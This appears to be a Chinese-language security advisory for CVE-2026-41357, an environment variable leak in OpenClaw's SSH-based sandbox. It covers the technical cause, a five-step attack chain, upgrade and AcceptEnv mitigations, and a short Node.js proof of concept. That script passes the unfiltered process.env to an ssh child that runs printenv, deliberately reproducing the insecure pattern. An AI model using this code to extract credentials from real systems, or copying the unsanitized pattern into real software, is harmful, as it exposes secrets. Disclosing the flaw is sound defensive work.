CVE-2026-41357 CVSS 3.3 低危

CVE-2026-41357 OpenClaw 环境变量泄露漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41357

漏洞类型

信息泄露

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.31 之前的版本存在环境变量泄露漏洞。该漏洞源于基于 SSH 的沙箱后端将未经过滤的 process.env 传递给子进程。攻击者可利用非默认的 SSH 环境转发配置，将父进程中的敏感环境变量泄露至 SSH 子进程，从而导致敏感信息外泄。

技术细节

该漏洞的核心在于 OpenClaw 在处理基于 SSH 的沙箱后端时，未能正确隔离进程环境。受影响的代码直接将父进程的 `process.env` 对象传递给子进程，未进行任何过滤或清洗。在特定的配置下，特别是当 SSH 服务端允许环境变量转发（`AcceptEnv` 指令配置不当）时，攻击者可以利用这一机制。攻击者首先需要获得本地低权限账户访问权限，随后通过触发 OpenClaw 的沙箱功能，利用 SSH 连接将精心构造的环境变量注入到子进程中。由于未过滤的 `process.env` 包含了父进程的所有环境变量，攻击者可以借此提取诸如数据库连接字符串、API 密钥或其他敏感配置信息。尽管 CVSS 评分较低，但这破坏了沙箱的安全边界，可能导致横向移动或凭证窃取。

攻击链分析

STEP 1

1. 获取本地访问权限

攻击者获得目标系统上的低权限用户访问权限。

STEP 2

2. 识别漏洞配置

确认系统运行受影响版本的 OpenClaw，且 SSH 配置允许环境变量转发。

STEP 3

3. 触发沙箱进程

攻击者触发 OpenClaw 的基于 SSH 的沙箱功能，导致应用程序生成子进程。

STEP 4

4. 利用环境转发

利用 SSH 的环境转发机制，由于父进程未过滤 process.env，敏感变量被传递到子进程。

STEP 5

5. 提取敏感信息

攻击者读取子进程的环境变量，获取父进程中的敏感凭证或密钥。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-41357: OpenClaw Environment Variable Leakage
// This script demonstrates the vulnerable behavior where process.env is passed to an SSH child process.

const { spawn } = require('child_process');

function simulateVulnerableSandbox(targetHost) {
    console.log(`[*] Attempting to connect to ${targetHost} via SSH...`);

    // VULNERABILITY: Passing 'process.env' directly without sanitization.
    // If SSH environment forwarding is enabled, sensitive variables from the parent
    // process (e.g., DB credentials, API keys) will be accessible in the child session.
    const child = spawn('ssh', [targetHost, 'printenv'], {
        env: process.env // The vulnerable line
    });

    child.stdout.on('data', (data) => {
        console.log(`[+] Leaked Environment Data:\n${data}`);
    });

    child.stderr.on('data', (data) => {
        console.error(`[!] Error: ${data}`);
    });

    child.on('close', (code) => {
        console.log(`[*] Process exited with code ${code}`);
    });
}

// Execute PoC (Requires a target where the attacker has some access and SSH forwarding is on)
// simulateVulnerableSandbox('user@target-server');

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

建议立即升级 OpenClaw 至 2026.3.31 或更高版本。若无法立即升级，请检查并禁用 SSH 服务端的环境变量转发选项（如 /etc/ssh/sshd_config 中的 AcceptEnv 指令），并确保 SSH 沙箱后端仅使用最小必要的环境变量集合运行。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表